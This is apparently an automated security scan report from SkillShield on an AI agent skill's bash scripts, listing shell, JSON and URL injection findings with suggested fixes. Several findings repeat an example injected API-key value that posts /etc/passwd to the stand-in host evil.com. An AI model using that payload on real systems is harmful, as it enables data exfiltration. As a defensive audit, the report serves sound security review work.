Trust Assessment
personal-agent received a trust score of 30/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 14 findings: 0 critical, 7 high, 6 medium, and 0 low severity. Key findings include Sensitive environment variable access: $HOME, Shell Injection via Unquoted API Key in Curl Header, URL Injection via Unencoded Club Name.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 0/100, indicating areas for improvement.
Last analyzed on February 13, 2026 (commit 13146e6a). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Layer Breakdown
Behavioral Risk Signals
Security Findings14
| Severity | Finding | Layer | Location | |
|---|---|---|---|---|
| HIGH | Shell Injection via Unquoted API Key in Curl Header The `API_KEY` variable is used directly within a double-quoted string in the `curl -H` command. If the `API_KEY` contains shell metacharacters (e.g., `" -X POST http://evil.com/exfil -d @/etc/passwd #`), an attacker could inject arbitrary shell commands, leading to data exfiltration or remote code execution. This vulnerability exists in multiple scripts. Ensure the `API_KEY` variable is strictly validated to contain only expected characters (e.g., alphanumeric, hyphens, underscores) or use a more robust method for passing headers that prevents shell injection, such as a dedicated HTTP client library in a higher-level language. If sticking to bash, consider using `printf %q` for complex escaping, though it's often simpler to validate input. | LLM | check.sh:20 | |
| HIGH | Shell Injection via Unquoted API Key in Curl Header The `API_KEY` variable is used directly within a double-quoted string in the `curl -H` command. If the `API_KEY` contains shell metacharacters (e.g., `" -X POST http://evil.com/exfil -d @/etc/passwd #`), an attacker could inject arbitrary shell commands, leading to data exfiltration or remote code execution. This vulnerability exists in multiple scripts. Ensure the `API_KEY` variable is strictly validated to contain only expected characters (e.g., alphanumeric, hyphens, underscores) or use a more robust method for passing headers that prevents shell injection, such as a dedicated HTTP client library in a higher-level language. If sticking to bash, consider using `printf %q` for complex escaping, though it's often simpler to validate input. | LLM | engage.sh:18 | |
| HIGH | Shell Injection via Unquoted API Key in Curl Header The `API_KEY` variable is used directly within a double-quoted string in the `curl -H` command. If the `API_KEY` contains shell metacharacters (e.g., `" -X POST http://evil.com/exfil -d @/etc/passwd #`), an attacker could inject arbitrary shell commands, leading to data exfiltration or remote code execution. This vulnerability exists in multiple scripts. Ensure the `API_KEY` variable is strictly validated to contain only expected characters (e.g., alphanumeric, hyphens, underscores) or use a more robust method for passing headers that prevents shell injection, such as a dedicated HTTP client library in a higher-level language. If sticking to bash, consider using `printf %q` for complex escaping, though it's often simpler to validate input. | LLM | post.sh:26 | |
| HIGH | JSON Injection via Unescaped Club Name in Post Data The `CLUB` variable is directly inserted into the JSON payload without proper JSON escaping. If `CLUB` is controlled by untrusted input and contains characters like `"` or `\`, an attacker could inject arbitrary JSON fields, manipulate the payload structure, or cause parsing errors, potentially leading to unintended actions or data corruption. JSON-escape the `$CLUB` variable before inserting it into the JSON payload. This can be done using `jq -Rs '.'` similar to how `MESSAGE_ESCAPED` is handled, or by using a programming language with built-in JSON serialization. | LLM | post.sh:29 | |
| HIGH | JSON Injection via Unescaped Variables in Registration Data The `BOT_NAME`, `BIO`, and `OWNER` variables are directly inserted into the JSON payload without proper JSON escaping. If these variables are controlled by untrusted input and contain characters like `"` or `\`, an attacker could inject arbitrary JSON fields, manipulate the payload structure, or cause parsing errors, potentially leading to unintended bot registration details or other vulnerabilities. JSON-escape the `$BOT_NAME`, `$BIO`, and `$OWNER` variables before inserting them into the JSON payload. This can be done using `jq -Rs '.'` or by using a programming language with built-in JSON serialization. | LLM | register.sh:13 | |
| HIGH | Shell Injection via Unquoted API Key in Curl Header The `API_KEY` variable is used directly within a double-quoted string in the `curl -H` command. If the `API_KEY` contains shell metacharacters (e.g., `" -X POST http://evil.com/exfil -d @/etc/passwd #`), an attacker could inject arbitrary shell commands, leading to data exfiltration or remote code execution. This vulnerability exists in multiple scripts. Ensure the `API_KEY` variable is strictly validated to contain only expected characters (e.g., alphanumeric, hyphens, underscores) or use a more robust method for passing headers that prevents shell injection, such as a dedicated HTTP client library in a higher-level language. If sticking to bash, consider using `printf %q` for complex escaping, though it's often simpler to validate input. | LLM | reply.sh:27 | |
| HIGH | URL Path Injection via Unencoded Post ID The `POST_ID` variable is directly inserted into the URL path without URL encoding or validation. If `POST_ID` is controlled by untrusted input and contains characters like `/`, `?`, or `#`, an attacker could manipulate the URL path, potentially targeting different API endpoints, bypassing security controls, or causing unexpected behavior. Validate `POST_ID` to ensure it only contains expected characters (e.g., alphanumeric) or URL-encode it before inserting it into the URL path. For example, use a utility like `urlencode` or a Python one-liner (`python -c 'import urllib.parse, sys; sys.stdout.write(urllib.parse.quote(sys.argv[1]))' "$POST_ID"`). | LLM | reply.sh:27 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/freeai-io/social-hub/check.sh:8 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/freeai-io/social-hub/engage.sh:9 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/freeai-io/social-hub/post.sh:10 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/freeai-io/social-hub/register.sh:41 | |
| MEDIUM | Sensitive environment variable access: $HOME Access to sensitive environment variable '$HOME' detected in shell context. Verify this environment variable access is necessary and the value is not exfiltrated. | Static | skills/freeai-io/social-hub/reply.sh:11 | |
| MEDIUM | URL Injection via Unencoded Club Name The `CLUB` variable is directly inserted into the URL query string without URL encoding. If `CLUB` is controlled by untrusted input and contains characters like `&`, `=`, or `?`, an attacker could inject additional URL parameters or manipulate the request, potentially leading to unexpected behavior or information disclosure. URL-encode the `$CLUB` variable before inserting it into the URL. For example, use a utility like `urlencode` or a Python one-liner (`python -c 'import urllib.parse, sys; sys.stdout.write(urllib.parse.quote_plus(sys.argv[1]))' "$CLUB"`). | LLM | feed.sh:9 | |
| INFO | Credential Storage in Local File The script stores the generated `API_KEY` and other bot credentials in a local file: `$HOME/.config/claw-club/credentials.json`. While this is intended functionality for persistence, it's crucial to ensure that the file permissions are set restrictively (e.g., `chmod 600`) to prevent unauthorized access to the API key by other users or processes on the system. After creating the `credentials.json` file, explicitly set its permissions to be readable only by the owner (e.g., `chmod 600 "$CONFIG_DIR/credentials.json"`). Also, ensure the `BOT_NAME` is JSON-escaped before writing to this file to prevent JSON injection into the config file itself. | LLM | register.sh:42 |
Scan History
Embed Code
[](https://skillshield.io/report/ae3f5fdccf9b5208)
Powered by SkillShield